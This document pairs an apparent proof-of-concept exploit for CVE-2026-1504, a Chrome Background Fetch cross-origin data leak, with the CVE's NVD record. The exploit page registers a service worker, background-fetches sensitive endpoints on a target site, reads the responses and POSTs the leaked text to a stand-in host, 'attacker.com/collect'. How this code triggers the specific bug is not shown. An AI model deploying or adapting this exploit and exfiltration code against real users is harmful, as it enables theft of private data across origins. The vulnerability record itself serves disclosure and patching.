CVE-2026-1504

<!-- CVE-2026-1504 PoC - Background Fetch API Cross-Origin Data Leak --> <!DOCTYPE html> <html> <head> <title>CVE-2026-1504 PoC</title> </head> <body> <h1>CVE-2026-1504 Background Fetch API Exploit</h1> <button id="exploitBtn">Start Exploitation</button> <div id="results"></div> <script> async function exploitCVE20261504() { const resultsDiv = document.getElementById('results'); resultsDiv.innerHTML = 'Starting exploitation...<br>'; try { // Register a service worker for Background Fetch if ('serviceWorker' in navigator) { const registration = await navigator.serviceWorker.register('sw.js'); resultsDiv.innerHTML += 'Service Worker registered<br>'; // Create a Background Fetch for cross-origin data const bgFetch = await registration.backgroundFetch.fetch( 'my-fetch', [ new Request('https://target-website.com/api/sensitive-data'), new Request('https://target-website.com/user/profile') ], { title: 'Downloading updates', icons: [{ src: 'icon.png', sizes: '512x512' }] } ); bgFetch.addEventListener('success', async () => { // Attempt to read the response data const response = await bgFetch.match('https://target-website.com/api/sensitive-data'); if (response) { const text = await response.text(); resultsDiv.innerHTML += 'Leaked data: ' + text + '<br>'; // Send data to attacker server await fetch('https://attacker.com/collect', { method: 'POST', body: text }); } }); } } catch (error) { resultsDiv.innerHTML += 'Error: ' + error.message + '<br>'; } } document.getElementById('exploitBtn').addEventListener('click', exploitCVE20261504); </script> </body> </html> <!-- sw.js - Service Worker for Background Fetch --> self.addEventListener('backgroundfetchsuccess', (event) => { const bgFetch = event.registration; event.waitUntil(async function() { const records = await bgFetch.matchAll(); for (const record of records) { const response = await record.responseReady; console.log('Fetched data:', await response.text()); } }()); });

{"cve": {"id": "CVE-2026-1504", "sourceIdentifier": "[email protected]", "published": "2026-01-27T21:16:00.480", "lastModified": "2026-02-06T17:45:56.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Background Fetch API in Google Chrome prior to 144.0.7559.110 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Implementación inapropiada en la API Background Fetch en Google Chrome anterior a 144.0.7559.110 permitió a un atacante remoto filtrar datos de origen cruzado a través de una página HTML manipulada. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0.7559.110", "matchCriteriaId": "C3E547F7-E289-4BCF-8788-32ACFE165948"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_27.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://issues.chromium.org/issues/474435504", "source": "[email protected]", "tags": ["Permissions Required"]}]}}